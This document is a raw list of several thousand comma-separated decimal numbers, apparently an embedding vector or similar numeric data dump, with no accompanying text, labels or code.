-0.02741917595267296, -0.012547393329441547, -0.007274474948644638, -0.017691178247332573, -0.005107915494590998, -0.006696965079754591, 0.009778214618563652, -0.018437279388308525, 0.005240635015070438, -0.01545287948101759, -0.016528984531760216, -0.024090422317385674, -0.008551454171538353, -0.03305796906352043, 0.033689286559820175, 0.012870225124061108, -0.01827945001423359, -0.018968157470226288, 0.0013424420030787587, 0.010058002546429634, -0.003183479653671384, -0.0297866091132164, 0.018609456717967987, -0.0319388210773468, -0.019312512129545212, -0.005050523206591606, -0.018652500584721565, 0.0396580845117569, -0.015223310329020023, -0.016528984531760216, 0.0033771786838769913, 0.023043012246489525, 0.001299397787079215, -0.027318738400936127, 0.022225171327590942, -0.003960069268941879, -0.014764171093702316, 0.0037484350614249706, 0.002932388335466385, -0.0033933203667402267, -0.011959122493863106, -0.03147968277335167, -0.004795844666659832, -0.0005331207648850977, -0.009785388596355915, 0.020704274997115135, -0.02391824498772621, 0.004096376243978739, -0.010208657011389732, -0.028265712782740593, -0.016701161861419678, -0.015567664057016373, 0.000353993964381516, 0.0017101113917306066, 0.009039288386702538, -0.028624413534998894, -0.026601335033774376, -0.02964312769472599, -0.02360258623957634, -0.00017284949717577547, 0.014154378324747086, -0.034693650901317596, -0.0067543573677539825, 0.014161552302539349, 0.013774153776466846, -0.00262569822371006, 0.014412643387913704, 0.011019323021173477, 0.030877061188220978, 0.0009200704516842961, -0.014613516628742218, 0.011535854078829288, -0.004706169478595257, 0.006729247979819775, 0.014010896906256676, -0.003576258197426796, -0.024492166936397552, 0.012784136459231377, -0.021522115916013718, -0.00409278878942132, -0.018365539610385895, -0.03320145234465599, 0.004648777190595865, 0.006991100497543812, -0.008372102864086628, -0.0008909259340725839, -0.015008089132606983, 0.005520422477275133, -0.025596968829631805, -0.00455192755907774, -0.008228622376918793, 0.0016984536778181791, -0.013013705611228943, 0.023502150550484657, 0.007389259524643421, 0.0037771312054246664, -0.012102602981030941, -0.005477378610521555, 0.006374133285135031, 0.02863876149058342, -0.01502243708819151, 0.002058949088677764, -0.025410445407032967, -0.02122080698609352, -0.014111333526670933, -0.017432913184165955, 0.029026160016655922, 0.006212717387825251, 0.009634734131395817, -0.008515583351254463, 0.01978599838912487, -0.017791615799069405, 0.010868668556213379, 0.0035529425367712975, -0.0030991847161203623, 0.00787709467113018, 0.02061818726360798, 0.024047376587986946, -0.004311596974730492, -0.020890800282359123, 0.008809719234704971, 0.01708856038749218, 0.00917559489607811, -0.006008257158100605, -0.01572549343109131, 0.008716456592082977, -0.00006619171472266316, 0.006445873528718948, -0.008070793002843857, 0.03386146202683449, 0.006991100497543812, -0.0024696628097444773, 0.004867585375905037, 0.01030909363180399, -0.00841514766216278, 0.016198979690670967, -0.009441034868359566, 0.00754708843305707, 0.028452236205339432, 0.00004430529224919155, -0.01561070792376995, 0.005520422477275133, 0.010782579891383648, 0.03004487417638302, -0.01552461925894022, -0.017361173406243324, 0.013142839074134827, 0.009039288386702538, 0.023616934195160866, 0.023502150550484657, 0.010431052185595036, -0.022713005542755127, -0.01539548672735691, -0.0015818754909560084, -0.00685479398816824, -0.008809719234704971, -0.02367432788014412, 0.008788197301328182, -0.03710412606596947, -0.012403912842273712, 0.0038560456596314907, 0.007934486493468285, -0.005642381496727467, -0.0029234206303954124, 0.009842781350016594, 0.004508883226662874, 0.0018114447593688965, 0.014520253986120224, -0.003522452898323536, -0.011363676749169827, -0.027863966301083565, 0.0036677271127700806, -0.01523765828460455, 0.017131604254245758, 0.007417955901473761, -0.011091063730418682, -0.00540563790127635, 0.010904538445174694, -0.018222058191895485, -0.0007846604567021132, -0.000947869848459959, 0.0027333085890859365, 0.012812833301723003, -0.006327501963824034, -0.02083340846002102, 0.004537579603493214, -0.00776230962947011, 0.02741917595267296, -0.0027476567775011063, -0.001428530435077846, 0.0013558933278545737, 0.002363845705986023, 0.0003620647476054728, -0.0024266184773296118, -0.0009667017147876322, 0.012741092592477798, 0.009763866662979126, 0.02043166197836399, 0.0010922474320977926, -0.0180929247289896, 0.005100741516798735, 0.010481270030140877, 0.03776413947343826, -0.005466617178171873, -0.0022921052295714617, -0.0024929784703999758, 0.005333897657692432, 0.005843254271894693, 0.00005884953498025425, -0.008070793002843857, 0.03236926347017288, 0.00875950139015913, -0.0065570711158216, -0.0029754324350506067, 0.03713282197713852, 0.029341816902160645, 0.028911376371979713, -0.00015894979878794402, -0.007206321693956852, 0.0017594329547137022, -0.00519759114831686, -0.01859510876238346, 0.004670299123972654, 0.026041759178042412, -0.009806910529732704, 0.014649386517703533, -0.0170455165207386, -0.00330543820746243, -0.017906399443745613, -0.005050523206591606, -0.024736085906624794, -0.003013096284121275, 0.004702582489699125, -0.009835606440901756, 0.0014079050160944462, -0.0018598694587126374, 0.0033664177171885967, 0.012597612105309963, 0.005925755947828293, -0.021708641201257706, -0.021579507738351822, 0.005477378610521555, 0.011614768765866756, -0.01116997841745615, 0.0026382526848465204, -0.012655003927648067, -0.01866684854030609, 0.011248892173171043, -0.0061911954544484615, 0.0015477988636121154, -0.020159048959612846, 0.01464221253991127, -0.017978141084313393, 0.02122080698609352, 0.003712564939633012, -0.0014088018797338009, 0.0017101113917306066, -0.0034291904885321856, -0.016198979690670967, 0.008981896564364433, 0.0042900750413537025, -0.0019513384904712439, -0.01830814592540264, 0.017318129539489746, -0.022727353498339653, -0.0042542046867311, -0.00893885176628828, 0.0012097222497686744, -0.013960679061710835, 0.014010896906256676, -0.008077967911958694, 0.006650333758443594, -0.004609319847077131, -0.03673107922077179, -0.0016365775372833014, -0.014147204346954823, 0.007977531291544437, -0.015280702151358128, 0.0029700519517064095, 0.0201877448707819, -0.023086056113243103, -0.016916383057832718, 0.0074036079458892345, -0.00931907631456852, 0.014218944124877453, -0.004293662030249834, -0.018179014325141907, 0.012396738864481449, 0.014448513276875019, -0.013286319561302662, 0.02107732556760311, -0.03348841145634651, -0.0020194919779896736, -0.009111029095947742, 0.0002345013926969841, 0.02852397784590721, 0.013128490187227726, 0.018006836995482445, 0.003934960346668959, -0.013738283887505531, -0.029169641435146332, 0.013731109909713268, -0.016213327646255493, 0.03173794597387314, 0.01680159755051136, -0.012490001507103443, 0.015510271303355694, -0.004587797448039055, 0.0023853678721934557, 0.007561436854302883, -0.008106663823127747, -0.02040296606719494, -0.013946331106126308, -0.005133024416863918, -0.005509661510586739, 0.01059605460613966, 0.012762614525854588, 0.017145952209830284, 0.018150318413972855, -0.005914994981139898, -0.011076715774834156, -0.0000703392070136033, 0.010509966872632504, 0.01169368252158165, 0.01870989240705967, -0.017002470791339874, -0.0014114921214058995, 0.006514027249068022, -0.01050279289484024, -0.0006528375088237226, 0.02129254676401615, 0.0258695837110281, -0.008479713462293148, 0.008121011778712273, -0.010187135078012943, -0.00671848701313138, 0.022756051272153854, -0.007525566499680281, 0.009613211266696453, 0.007582958787679672, 0.010366485454142094, -0.004634428769350052, 0.01309262029826641, 0.009842781350016594, -0.022153431549668312, -0.0025019459426403046, -0.016457244753837585, 0.013379582203924656, -0.023875201120972633, 0.011435417458415031, -0.010904538445174694, 0.002552164252847433, 0.00942668691277504, 0.0017235627165064216, -0.011499984189867973, -0.01223173551261425, -0.008020575158298016, -0.014527427963912487, 0.0009362120181322098, 0.0060369535349309444, -0.013480018824338913, -0.01523765828460455, 0.013078272342681885, 0.025482185184955597, -0.000058569297834765166, 0.014922000467777252, 0.006765118334442377, 0.012497175484895706, 0.007862746715545654, 0.01611289009451866, 0.0008994450909085572, -0.0012473859824240208, -0.00949842669069767, 0.004993130918592215, -0.02467869222164154, 0.006223478354513645, 0.02061818726360798, -0.017648134380578995, -0.005344658624380827, 0.0010940409265458584, -0.010961931198835373, 0.019341208040714264, -0.008242970332503319, -0.02043166197836399, 0.011743901297450066, 0.01935555599629879, 0.007468174211680889, -0.01737552136182785, 0.024922609329223633, 0.006148151122033596, 0.018623804673552513, 0.005606511142104864, 0.002057155594229698, 0.007891442626714706, -0.01827945001423359, -0.007669047452509403, 0.013178708963096142, 0.014154378324747086, 0.008486887440085411, -0.007113059051334858, -0.0037950663827359676, -0.010983453132212162, -0.0148933045566082, 0.02374606765806675, -0.008027749136090279, -0.01160042081028223, -0.02183777280151844, 0.015137221664190292, -0.01992947980761528, 0.021665597334504128, 0.010588880628347397, 0.02241169661283493, -0.025697406381368637, 0.008128185756504536, 0.010883016511797905, 0.007826875895261765, -0.0021253088489174843, -0.004942912608385086, 0.005233461037278175, -0.000219144465518184, 0.00529802730306983, 0.037247609347105026, 0.008501235395669937, 0.018078576773405075, 0.010495618917047977, 0.0024319991935044527, -0.014132856391370296, 0.018767284229397774, 0.010567358694970608, -0.0021791141480207443, 0.00917559489607811, -0.009340598247945309, -0.0019208488520234823, -0.006155325099825859, -0.001788129098713398, 0.023846503347158432, 0.00929755438119173, -0.004311596974730492, 0.009577341377735138, -0.02388954907655716, 0.011012149043381214, -0.013408278115093708, 0.0007160587119869888, 0.017490306869149208, 0.0033018512185662985, -0.0029485297854989767, 0.031565770506858826, 0.03314405679702759, -0.0131141422316432, 0.01061040349304676, 0.013028054498136044, -0.000023287600924959406, 0.011987818405032158, 0.023717371746897697, -0.02637176588177681, -0.020116005092859268, -0.014010896906256676, 0.0382806695997715, 0.01057453267276287, 0.01873858831822872, -0.022182127460837364, -0.02100558578968048, -0.0002549025521147996, -0.012920443899929523, 0.011973470449447632, -0.006223478354513645, 0.017102908343076706, -0.006524788215756416, 0.010352137498557568, 0.016887687146663666, -0.011019323021173477, -0.010567358694970608, 0.015711143612861633, 0.00733904168009758, -0.005732056684792042, 0.014254814945161343, -0.009347772225737572, -0.019915131852030754, 0.003061520867049694, -0.01992947980761528, 0.010667795315384865, 0.008902981877326965, 0.01565375179052353, -0.019742954522371292, -0.017131604254245758, -0.01162194274365902, -0.003208588808774948, -0.00246428232640028, 0.017031166702508926, -0.002295692451298237, 0.006166086066514254, -0.009125377051532269, -0.0007936280453577638, -0.0004604835994541645, -0.032684918493032455, 0.016902035102248192, 0.0237747635692358, 0.007109472062438726, -0.0318814292550087, 0.0066001154482364655, 0.012561741285026073, 0.009182769805192947, 0.011198674328625202, 0.007059253752231598, -0.02367432788014412, 0.0072708879597485065, -0.007059253752231598, -0.02856702171266079, -0.006998274475336075, -0.001876011141575873, 0.0002822535752784461, -0.03216838836669922, -0.005929342936724424, 0.003502724226564169, 0.021062977612018585, 0.0025575447361916304, -0.003380765672773123, -0.0018921527080237865, -0.009921695105731487, -0.020991237834095955, 0.002837332198396325, -0.007927312515676022, 0.018465975299477577, -0.03704673424363136, -0.018465975299477577, 0.014053941704332829, 0.0049787829630076885, 0.03021704964339733, -0.002268789801746607, 0.00476714875549078, 0.011664986610412598, 0.016959426924586296, -0.001294017187319696, -0.010818449780344963, 0.006492504850029945, 0.003988765645772219, -0.0009371087653562427, 0.0026705358177423477, -0.016457244753837585, 0.012461304664611816, -0.004720517434179783, -0.005204765126109123, -0.01780596375465393, 0.029413558542728424, 0.0005833390168845654, 0.019082942977547646, 0.015165917575359344, -0.007184799760580063, 0.001530760433524847, 0.0017361172940582037, -0.019470341503620148, -0.021665597334504128, -0.011557376012206078, 0.0066682687029242516, -0.021966906264424324, -0.01386741641908884, 0.015252006240189075, 0.00992886908352375, 0.02021644078195095, -0.0033556565176695585, -0.0007286132895387709, 0.017576394602656364, -0.000548813957720995, 0.010122568346560001, 0.00006086723442422226, 0.004247030708938837, -0.014434165321290493, 0.007798179984092712, 0.012741092592477798, 0.006463808938860893, 0.015008089132606983, 0.016701161861419678, 0.0036049543414264917, 0.011033670976758003, 0.0067938147112727165, 0.00005736428647651337, -0.00754708843305707, 0.044306863099336624, -0.024807825684547424, 0.004889107309281826, -0.005642381496727467, -0.019699910655617714, 0.025783494114875793, 0.008034923113882542, 0.012425434775650501, -0.043187711387872696, 0.016270719468593597, -0.014125682413578033, 0.006094345822930336, 0.00805644504725933, -0.005086393561214209, -0.02792135812342167, -0.019255120307207108, 0.01523765828460455, 0.006905012298375368, -0.025625666603446007, -0.006804575677961111, 0.01014409027993679, 0.010065176524221897, 0.007704917341470718, 0.020087307319045067, 0.006783053278923035, -0.0244634710252285, -0.008773849345743656, -0.0016850023530423641, -0.0049393256194889545, -0.007382085546851158, -0.024922609329223633, -0.0012617340544238687, 0.01820771023631096, -0.0013433387503027916, 0.0036282700020819902, 0.002148624509572983, -0.0066862041130661964, -0.001313745859079063, -0.003188860137015581, 0.004426382016390562, -0.02863876149058342, -0.005789448972791433, -0.004645190201699734, 0.009476904757320881, -0.0019477515015751123, -0.015295050106942654, 0.0035780516918748617, -0.014233293011784554, -0.01885337382555008, 0.015668099746108055, 0.01802118495106697, 0.0013926601968705654, -0.007518392521888018, -0.006227065343409777, 0.022067341953516006, 0.022296911105513573, -0.03147968277335167, 0.02431999146938324, -0.025812190026044846, 0.008910155855119228, 0.017217691987752914, -0.017102908343076706, 0.0053410716354846954, 0.008192752487957478, 0.006140977144241333, -0.007834049873054028, 0.013393930159509182, -0.008608845993876457, 0.012798484414815903, 0.009663430042564869, -0.0019082942744717002, 0.007956008426845074, -0.0006851206999272108, 0.022583873942494392, -0.009677777998149395, 0.00875950139015913, -0.001766607048921287, -0.008981896564364433, -0.009096681140363216, 0.0030292377341538668, 0.019111638888716698, -0.00426137913018465, -0.0028624413534998894, -0.01496504433453083, -0.0034901697654277086, 0.019757302477955818, 0.016959426924586296, -0.014283510856330395, -0.012238909490406513, -0.0024678693152964115, -0.002525261603295803, -0.014147204346954823, -0.003917024936527014, -0.005800210405141115, -0.01269804872572422, -0.005631620064377785, 0.007726439740508795, -0.01594071462750435, 0.02248343639075756, -0.0023028664290905, -0.02597001940011978, -0.004573449492454529, 0.01129911094903946, 0.03104923851788044, 0.02043166197836399, -0.019958175718784332, -0.009835606440901756, 0.00545944320037961, -0.007087950129061937, -0.00878102332353592, 0.013558932580053806, -0.0004860411281697452, 0.03142228722572327, -0.005376941990107298, 0.006965991575270891, 0.01873858831822872, -0.023760415613651276, -0.0011083889985457063, -0.01343697402626276, 0.014333728700876236, 0.00607999786734581, 0.00998626183718443, -0.03345971554517746, -0.004447903949767351, 0.02104862965643406, -0.02295692265033722, -0.0020679165609180927, -0.0010339582804590464, 0.019269468262791634, -0.017676830291748047, -0.005290853325277567, -0.019226422533392906, 0.018896417692303658, -0.0032193497754633427, 0.010983453132212162, 0.01388893835246563, 0.020517749711871147, 0.02327258139848709, 0.00623423932120204, -0.012303476221859455, 0.011126933619379997, -0.005247809458523989, -0.020130353048443794, -0.0005667490768246353, -0.00031924471841193736, -0.0016751380171626806, -0.003007715567946434, 0.024291295558214188, 0.010883016511797905, -0.00666468171402812, -0.005211939103901386, 0.004121485166251659, 0.007389259524643421, 0.006331088952720165, 0.012109776958823204, -0.007690569385886192, -0.01572549343109131, 0.018365539610385895, 0.003852458670735359, 0.009914521127939224, 0.0241047702729702, 0.01140672154724598, 0.0017558459658175707, -0.004175290465354919, -0.0042542046867311, -0.0073031713254749775, 0.01639985293149948, -0.002507326425984502, 0.004698995500802994, 0.00575716607272625, 0.020159048959612846, -0.042499005794525146, 0.019599473103880882, 0.01261196006089449, 0.01601245440542698, 0.013336537405848503, -0.0014859227230772376, -0.029040507972240448, -0.010423878207802773, 0.0047994316555559635, 0.0216225516051054, -0.0018939462024718523, -0.039084162563085556, -0.007525566499680281, 0.008809719234704971, -0.0009451796067878604, 0.01873858831822872, 0.013716761954128742, 0.0008474332862533629, 0.015036785043776035, -0.007891442626714706, 0.016701161861419678, -0.007360563613474369, 0.0005138405249454081, -0.010517140850424767, -0.0209338441491127, 0.001563940430060029, 0.013200230896472931, -0.008967548608779907, -0.0009182769572362304, 0.004455077927559614, 0.014412643387913704, -0.013372408226132393, 0.004451490938663483, 0.014477210119366646, 0.004964434541761875, -0.03176664188504219, 0.0033000577241182327, 0.001394453807733953, 0.008135359734296799, 0.007001861464232206, 0.014204596169292927, -0.008321885019540787, 0.0113493287935853, 0.019671212881803513, -0.0028534738812595606, 0.01244695670902729, 0.007496870122849941, 0.022540830075740814, -0.034808434545993805, -0.009785388596355915, -0.007826875895261765, 0.013917635194957256, 0.01003647968173027, 0.022655613720417023, -0.0023028664290905, -0.024994350969791412, 0.006876315921545029, 0.009326250292360783, 0.043905116617679596, -0.01997252367436886, 0.02238300070166588, 0.0006792917847633362, -0.010266048833727837, -0.024305643513798714, -0.0108112758025527, 0.00707001518458128, 0.012203039601445198, -0.01287739910185337, -0.04335989058017731, 0.0022257454693317413, -0.017935097217559814, 0.020460357889533043, -0.00671848701313138, 0.011291936971247196, 0.024334339424967766, -0.004627254791557789, -0.013910461217164993, -0.005663903430104256, -0.011485636234283447, 0.002344117034226656, -0.010553010739386082, -0.0016814152477309108, -0.015495923347771168, -0.02546783722937107, 0.009885825216770172, 0.00816405564546585, -0.0005268434761092067, 0.001978241140022874, -0.010553010739386082, 0.007826875895261765, -0.018724240362644196, 0.02899746410548687, 0.014692431315779686, 0.012647829949855804, -0.0074466522783041, 0.00765469903126359, 0.00551324849948287, 0.009878651238977909, -0.03288579359650612, -0.0024929784703999758, -0.010086698457598686, 0.007704917341470718, 0.002003350295126438, 0.010373659431934357, -0.022727353498339653, -0.0073175192810595036, -0.01496504433453083, -0.008135359734296799, -0.007080776151269674, -0.03036053106188774, -0.021737337112426758, -0.013910461217164993, -0.003325166879221797, -0.003676694817841053, 0.020388618111610413, 0.012203039601445198, -0.008479713462293148, -0.007582958787679672, 0.008608845993876457, 0.0030166832730174065, 0.006915773265063763, 0.009936043061316013, -0.010223004966974258, -0.010230178944766521, -0.00044837742461822927, 0.0027655919548124075, 0.007582958787679672, -0.004125072155147791, 0.007152516394853592, -0.0038345237262547016, -0.015883320942521095, 0.007034144829958677, 0.007848397828638554, -0.002883963519707322, -0.021364286541938782, 0.013810024596750736, -0.005018239840865135, -0.018982505425810814, -0.000014698372069688048, -0.003773544216528535, 0.0068260976113379, -0.0038488716818392277, 0.026558291167020798, -0.017217691987752914, -0.028552673757076263, 0.007080776151269674, -0.01046692207455635, 0.0032121757976710796, 0.0060118441469967365, 0.010043653659522533, -0.005491726566106081, 0.007611655164510012, -0.02828006073832512, -0.0026741228066384792, -0.027361782267689705, 0.0034435384441167116, -0.007141755428165197, -0.004096376243978739, 0.0016850023530423641, -0.01190890371799469, 0.012009340338408947, 0.0006990203983150423, 0.01457047276198864, 0.00809231586754322, -0.022583873942494392, 0.008537106215953827, 0.006729247979819775, -0.00029929191805422306, -0.013444148004055023, 0.026615682989358902, -0.01856641098856926, -0.011363676749169827, -0.018394235521554947, 0.015883320942521095, 0.022311260923743248, -0.005064871162176132, 0.007367737591266632, -0.018365539610385895, -0.008192752487957478, -0.011758249253034592, -0.013609151355922222, -0.0017092146445065737, 0.0009962946642190218, 0.006811749655753374, 0.011765423230826855, -0.0048855203203856945, 0.014563298784196377, 0.010861494578421116, -0.0054128123447299, -0.016428548842668533, -0.008443843573331833, -0.009799736551940441, -0.022856486961245537, -0.019154682755470276, 0.009878651238977909, -0.028409192338585854, -0.0029359753243625164, -0.004946499597281218, 0.026400461792945862, -0.018222058191895485, -0.003452506149187684, 0.007037731818854809, -0.021952558308839798, 0.019814694300293922, -0.01997252367436886, -0.015668099746108055, 0.004232682753354311, 0.02312909997999668, 0.01845162734389305, 0.0013236100785434246, 0.005290853325277567, -0.019154682755470276, 0.014563298784196377, 0.015582012012600899, -0.006894250866025686, -0.010409530252218246, -0.004627254791557789, 0.0234160628169775, 0.004716930445283651, 0.00583608029410243, 0.003999526612460613, -0.0005887195584364235, -0.00918994378298521, 0.0054415082558989525, 0.013573281466960907, 0.01579723320901394, -0.0033843526616692543, 0.03191012516617775, 0.019011201336979866, -0.004404859617352486, -0.0043689897283911705, -0.005610098131000996, -0.031565770506858826, -0.0009756692452356219, -0.007582958787679672, 0.0036802818067371845, -0.00575716607272625, -0.006252174731343985, 0.0008232209365814924, 0.027763528749346733, 0.009225813671946526, -0.0011541234562173486, 0.006072823889553547, 0.02716091088950634, -0.015625055879354477, -0.003432777477428317, 0.02472173608839512, -0.0005057697417214513, 0.022139083594083786, 0.01935555599629879, 0.006711313035339117, 0.011700856499373913, -0.00787709467113018, 0.009462556801736355, -0.010567358694970608, 0.014183074235916138, 0.0054881395772099495, 0.0053554195910692215, -0.0015791852492839098, -0.0006882593152113259, 0.016715509817004204, -0.0041824644431471825, 0.014491558074951172, 0.002290311735123396, 0.006169673055410385, -0.01116997841745615, -0.006356198340654373, 0.012303476221859455, -0.0042900750413537025, -0.018265102058649063, -0.018150318413972855, -0.0023028664290905, 0.009828432463109493, 0.0226986575871706, -0.008128185756504536, 0.0006156222079880536, 0.0009218639461323619, -0.014993740245699883, 0.00021566954092122614, -0.004325945395976305, 0.0042219217866659164, -0.003244458930566907, 0.006829684600234032, 0.0014661941677331924, -0.011306284926831722, -0.013013705611228943, 0.02004426345229149, 0.030130961909890175, -0.03216838836669922, -0.007597306743264198, -0.013171534985303879, -0.0006985720247030258, -0.0012034450192004442, 0.012138472869992256, -0.007299584336578846, -0.005599337164312601, 0.013766979798674583, 0.012949139811098576, 0.006575006525963545, 0.03208230063319206, -0.01223173551261425, 0.0073175192810595036, 0.011657812632620335, 0.015208961442112923, 0.006291632074862719, 0.006388481240719557, 0.009476904757320881, 0.002322595100849867, -0.0273043904453516, -0.0007362356991507113, 0.020704274997115135, -0.0004712446534540504, -0.0042219217866659164, -0.013322189450263977, -0.022784747183322906, -0.0027871138881891966, 0.045024264603853226, 0.007141755428165197, 0.021091673523187637, -0.028810938820242882, 0.010782579891383648, -0.004544753581285477, -0.011772597208619118, -0.011507158167660236, -0.0011083889985457063, -0.00043492609984241426, -0.015739841386675835, 0.002580860396847129, -0.024305643513798714, -0.014993740245699883, 0.011571723967790604, -0.010789753869175911, 0.0018114447593688965, -0.005846841260790825, 0.009957565926015377, 0.004580623470246792, 0.025955671444535255, -0.014548949897289276, 0.04137985408306122, 0.013271971605718136, 0.007798179984092712, -0.015883320942521095, -0.007389259524643421, 0.004742039367556572, 0.0006102416664361954, -0.00830753706395626, 0.000880613224580884, 0.015840277075767517, -0.00166617042850703, 0.013845894485712051, 0.00677229231223464, -0.023071708157658577, 0.009649082086980343, 0.010007783770561218, 0.006259348709136248, 0.005437921267002821, 0.013810024596750736, 0.01502243708819151, 0.01852336712181568, 0.011399547569453716, -0.03587019443511963, 0.016787249594926834, -0.008149707689881325, -0.012088255025446415, -0.009806910529732704, -0.021608203649520874, -0.0015818754909560084, -0.002566512208431959, 0.0009263477404601872, 0.012669351883232594, -0.013558932580053806, -0.002991574117913842, 0.0066682687029242516, 0.004620080813765526, 0.008529932238161564, -0.011442591436207294, -0.0008501235861331224, 0.003289296757429838, -0.011248892173171043, 0.034234512597322464, 0.006729247979819775, 0.0009326250292360783, -0.004620080813765526, 0.01885337382555008, -0.007052079774439335, -0.01708856038749218, 0.00047707356861792505, -0.011342154815793037, -0.00971364788711071, -0.01942729577422142, -0.020847756415605545, 0.019412947818636894, -0.010710839182138443, -0.006725660990923643, -0.007353389635682106, -0.0375632643699646, -0.028179623186588287, 0.01601245440542698, -0.005254983436316252, 0.0012222768273204565, -0.0002905485744122416, -0.005165307782590389, 0.01741856522858143, 0.009548645466566086, -0.0048066056333482265, -0.01594071462750435, 0.00613380316644907, 0.02226821519434452, -0.012784136459231377, -0.009354946203529835, 0.0005411915481090546, 0.004458664916455746, 0.018107272684574127, -0.023215189576148987, 0.002634665695950389, 0.002283137757331133, 0.004419207572937012, -0.008077967911958694, -0.009957565926015377, 0.00020647779456339777, 0.006729247979819775, -0.03236926347017288, -0.014993740245699883, -0.026558291167020798, -0.01215999573469162, 0.025697406381368637, 0.006463808938860893, -0.005254983436316252, -0.01050279289484024, 0.010172787122428417, -0.00982125848531723, 0.0008380173821933568, 0.013551758602261543, -0.01156454998999834, -0.01647159270942211, -0.010660621337592602, 0.0042434437200427055, 0.009684951975941658, 0.004616493824869394, 0.0019746541511267424, 0.023731719702482224, -0.018422931432724, -0.005201178137212992, 0.009333424270153046, 0.0042219217866659164, -0.007941660471260548, -0.006499678827822208, -0.0029628779739141464, 0.008702108636498451, -0.01720334403216839, -0.0061911954544484615, -0.01859510876238346, 0.002186288358643651, 0.019556429237127304, 0.002344117034226656, 0.01978599838912487, 0.0049249776639044285, 0.004132246132940054, -0.008766675367951393, 0.02345910668373108, -0.019484689459204674, -0.015998106449842453, -0.006280870642513037, 0.0120523851364851, 0.0016823119949549437, -0.00861601997166872, 0.008027749136090279, 0.008386450819671154, 0.02345910668373108, -0.02050340175628662, -0.012956313788890839, 0.008034923113882542, 0.03782153129577637, -0.020489053800702095, 0.0102875716984272, -0.03213969245553017, 0.016170283779501915, 0.015782885253429413, -0.012138472869992256, 0.004641602747142315, 0.011019323021173477, -0.005416399333626032, 0.005247809458523989, 0.01190890371799469, -0.0209338441491127, -0.008795371279120445, -0.006173260044306517, 0.00929755438119173, -0.04783648997545242, -0.022713005542755127, 0.0030059220734983683, 0.021364286541938782, -0.007575784809887409, 0.0010617576772347093, 0.019656864926218987, 0.000599480583332479, 0.0166581179946661, -0.004379750695079565, -0.007798179984092712, 0.00996473990380764, 0.0007254746742546558, -0.020589491352438927, 0.000038924765249248594, -0.0015890495851635933, -0.0030848365277051926, 0.009828432463109493, 0.018537715077400208, 0.007941660471260548, -0.015955062583088875, 0.0008756810566410422, -0.0017728842794895172, 0.02370302379131317, -0.006998274475336075, 0.019154682755470276, -0.008192752487957478, 0.01246847864240408, -0.002980812918394804, -0.00449812225997448, -0.00021309136354830116, -0.02467869222164154, 0.007288823369890451, 0.018322493880987167, 0.014591994695365429, 0.008766675367951393, 0.006485330872237682, 0.0007747961790300906, 0.0019943828228861094, 0.010086698457598686, -0.01169368252158165, -0.014764171093702316, 0.023688675835728645, -0.006445873528718948, -0.025051742792129517, 0.005018239840865135, 0.01572549343109131, -0.020732970908284187, -0.02632872201502323, -0.03960069268941879, 0.0033269603736698627, -0.004803018644452095, 0.006983926519751549, 0.0028176037594676018, 0.0031404353212565184, -0.021392982453107834, -0.021679945290088654, -0.013910461217164993, 0.007970357313752174, 0.0072708879597485065, -0.008422321639955044, 0.013121316209435463, 0.015208961442112923, 0.014599168673157692, 0.010230178944766521, 0.000002669246669029235, 0.010832798667252064, -0.007030557841062546, 0.006481743883341551, -0.022038646042346954, -0.01622767560184002, -0.006438699550926685, 0.0066144634038209915, 0.0054558562114834785, -0.025769146159291267, 0.02780657447874546, -0.011213022284209728, 0.00455192755907774, -0.007019796874374151, 0.016787249594926834, 0.005940103903412819, -0.005021826829761267, -0.00503617525100708, 0.007582958787679672, 0.0008707489469088614, 0.010653447359800339, -0.00794883444905281, 0.021392982453107834, 0.03302927315235138, 0.019728606566786766, 0.016500288620591164, 0.027605701237916946, 0.0017441881354898214, -0.0016894860891625285, -0.0026185240130871534, -0.0016401645261794329, 0.010366485454142094, -0.0008945129229687154, -0.0016598931979387999, 0.007783832028508186, 0.006496091838926077, 0.014685257337987423, -0.001171161769889295, 0.039084162563085556, 0.0010931441793218255, 0.007453826256096363, 0.0028965179808437824, 0.013480018824338913, -0.004957260563969612, -0.02298562042415142, 0.005552705843001604, -0.0053016142919659615, -0.0102875716984272, -0.01694507896900177, -0.008171229623258114, -0.030130961909890175, -0.007141755428165197, -0.01025170087814331, -0.0029951611068099737, -0.02529565989971161, -0.01474982313811779, -0.0018060641596093774, -0.003630063496530056, -0.006628811825066805, -0.02813657931983471, 0.016356807202100754, 0.000042651900002965704, 0.006309567019343376, 0.00982125848531723, 0.003913437947630882, 0.0125760892406106, 0.008845589123666286, -0.0054809655994176865, 0.005714121740311384, 0.0032946772407740355, 0.0017092146445065737, -0.007776658050715923, -0.014864607714116573, -0.015538967214524746, -0.018265102058649063, -0.0018921527080237865, -0.0012500762240961194, -0.007091537117958069, 0.016414200887084007, -0.01518026553094387, 0.006844033021479845, -0.027390480041503906, 0.008960374630987644, 0.0031673379708081484, -0.003931373357772827, 0.010058002546429634, 0.019125986844301224, -0.0066610947251319885, -0.005706947762519121, -0.014979392290115356, 0.008773849345743656, -0.019800346344709396, -0.006894250866025686, -0.019585125148296356, -0.00457703648135066, -0.01637115515768528, 0.014835911802947521, 0.0035475620534271, -0.008422321639955044, 0.0032408719416707754, 0.01347284484654665, -0.00712382048368454, 0.007468174211680889, 0.003805827582255006, 0.0003304541460238397, -0.0021235153544694185, -0.00023674327530898154, 0.0018024771707132459, -0.00765469903126359, 0.010796927846968174, 0.0073175192810595036, -0.002830158220604062, 0.0018742175307124853, 0.007561436854302883, 0.014993740245699883, 0.008551454171538353, 0.008745153434574604, 0.007227844092994928, -0.02493695728480816, 0.01322175282984972, 0.0029879871290177107, 0.012518697418272495, 0.00819992646574974, 0.0011828196002170444, -0.00677229231223464, 0.023086056113243103, 0.010158438235521317, 0.014850259758532047, 0.011141281574964523, 0.01978599838912487, -0.02205299399793148, -0.0013998342910781503, 0.006514027249068022, -0.01007235050201416, -0.00865189079195261, 0.017705528065562248, -0.004638015758246183, 0.000006189709893078543, 0.004379750695079565, -0.016902035102248192, 0.01766248233616352, -0.01661507412791252, 0.020776016637682915, 0.01410415954887867, -0.009383642114698887, -0.015567664057016373, 0.014218944124877453, 0.02424824982881546, -0.0004914216697216034, -0.010983453132212162, 0.01720334403216839, 0.012102602981030941, -0.011220196262001991, 0.0026830905117094517, 0.016543332487344742, 0.004526818171143532, 0.006352611351758242, -0.012525871396064758, 0.02274170145392418, 0.014635038562119007, 0.01784900762140751, 0.024004332721233368, 0.010108220390975475, 0.008859938010573387, -0.00572846969589591, 0.01325762365013361, 0.019226422533392906, -0.008085141889750957, -0.00035354559076949954, 0.01845162734389305, -0.03675977513194084, -0.027763528749346733, -0.002274170285090804, 